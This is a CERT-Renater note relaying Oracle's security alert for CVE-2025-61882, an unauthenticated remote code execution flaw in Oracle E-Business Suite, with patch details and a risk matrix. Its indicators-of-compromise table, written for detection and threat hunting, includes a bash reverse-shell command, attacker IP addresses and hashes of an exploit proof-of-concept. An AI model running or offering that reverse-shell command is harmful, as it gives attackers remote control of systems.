Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN691
_____________________________________________________________________

DATE                : 13/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Oracle E-Business Suite versions
                          12.2.3 up to and including 12.2.14.

=====================================================================
https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
_____________________________________________________________________

Oracle Security Alert Advisory - CVE-2025-61882

Description

This Security Alert addresses vulnerability CVE-2025-61882 in Oracle
E-Business Suite. This vulnerability is remotely exploitable without
authentication, i.e., it may be exploited over a network without the
need for a username and password. If successfully exploited, this
vulnerability may result in remote code execution.

Oracle strongly recommends that customers apply the updates provided
by this Security Alert as soon as possible. Oracle always recommends
that customers remain on actively-supported versions and apply all
Security Alerts and Critical Patch Update security patches without
delay. Note that the October 2023 Critical Patch Update is a
prerequisite for application of the updates in this Security Alert.

Indicators of compromise (IP addresses, observed commands, and files)
to support immediate detection, hunting, and containment are
detailed below the risk matrix.


Affected Products and Patch Information

Security vulnerabilities addressed by this Security Alert affect the
products listed below.

Please click on the links in the Patch Availability Document column
below to access the documentation for patch availability information
and installation instructions.


Affected Products and Versions           Patch Availability Document
Oracle E-Business Suite,
versions 12.2.3-12.2.14                  Oracle E-Business Suite


Security Alert Supported Products and Versions

Patches released through the Security Alert program are provided
only for product versions that are covered under the Premier Support
or Extended Support phases of the Lifetime Support Policy. Oracle
recommends that customers plan product upgrades to ensure that
patches released through the Security Alert program are available
for the versions they are currently running.

Product releases that are not under Premier Support or Extended
Support are not tested for the presence of vulnerabilities addressed
by this Security Alert. However, it is likely that earlier versions
of affected releases are also affected by these vulnerabilities.
As a result, Oracle recommends that customers upgrade to
supported versions.


References

    Oracle Critical Patch Updates, Security Alerts and Bulletins
    Oracle Critical Patch Updates and Security Alerts - Frequently
      Asked Questions
    Risk Matrix Definitions
    Use of Common Vulnerability Scoring System (CVSS) by Oracle
    English text version of the risk matrices
    CSAF JSON version of the risk matrices
    Map of CVE to Advisory/Alert
    Oracle Lifetime support Policy
    JEP 290 Reference Blocklist Filter


Risk Matrix Content

Risk matrices list only security vulnerabilities that are newly
addressed by the patches associated with this advisory. Risk
matrices for previous security patches can be found in previous
Critical Patch Update advisories and Alerts. An English text
version of the risk matrices provided in this document is here.

Security vulnerabilities are scored using CVSS version 3.1
(see Oracle CVSS Scoring for an explanation of how Oracle
applies CVSS version 3.1).

Oracle conducts an analysis of each security vulnerability
addressed by a Security Alert. Oracle does not disclose
detailed information about this security analysis to
customers, but the resulting Risk Matrix and associated
documentation provide information about conditions required
to exploit the vulnerability and the potential impact of a
successful exploit. Oracle provides this information so that
customers may conduct their own risk analysis based on the
particulars of their product usage. For more information, see
Oracle vulnerability disclosure policies.

The protocol in the risk matrix implies that all of its secure
variants are affected as well. For example, if HTTP is listed
as an affected protocol, it implies that HTTPS is also affected.
The secure variant of a protocol is listed in the risk matrix
only if it is the only variant affected.


Credit Statement

The following people or organizations reported security
vulnerabilities addressed by this Security Alert to Oracle:
None credited in this Security Alert.


Modification History

Date                    Note
2025-October-06         Rev 2. Clarified IOCs table.
2025-October-04         Rev 1. Initial Release.

 
 
Oracle E-Business Suite Risk Matrix

This Security Alert contains 1 new security patch for Oracle
E-Business Suite.  This vulnerability is remotely exploitable
without authentication, i.e., may be exploited over a network
without requiring user credentials.  The English text form of
this Risk Matrix can be found here.


CVE ID     Product   Component
Protocol  Remote Exploit without Auth.?
CVSS VERSION 3.1 RISK (see Risk Matrix Definitions)
Base Score   Attack Vector   Attack Complex   Privs Req'd
User Interact   Scope 	Confid-entiality   Inte-grity
Avail-ability   Supported Versions Affected 	Notes

CVE-2025-61882 	Oracle Concurrent Processing  BI Publisher Integration
HTTP   Yes   9.8    Network    Low    None    None   Un-changed
High 	High 	High 	12.2.3-12.2.14 	 


Indicators of Compromise (IOCs)

The following indicators of compromise represent observed
activity (not limited to CVE-2025-61882) and are provided
to accelerate detection, threat hunting, and containment.
 
Indicator      Type     Description
200[.]107[.]207[.]26 	IP 	Potential GET and POST activity

185[.]181[.]60[.]11 	IP 	Potential GET and POST activity

sh -c /bin/bash -i >& /dev/tcp// 0>&1 	     Command 
Establish an outbound TCP connection over a specific port

76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py

6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================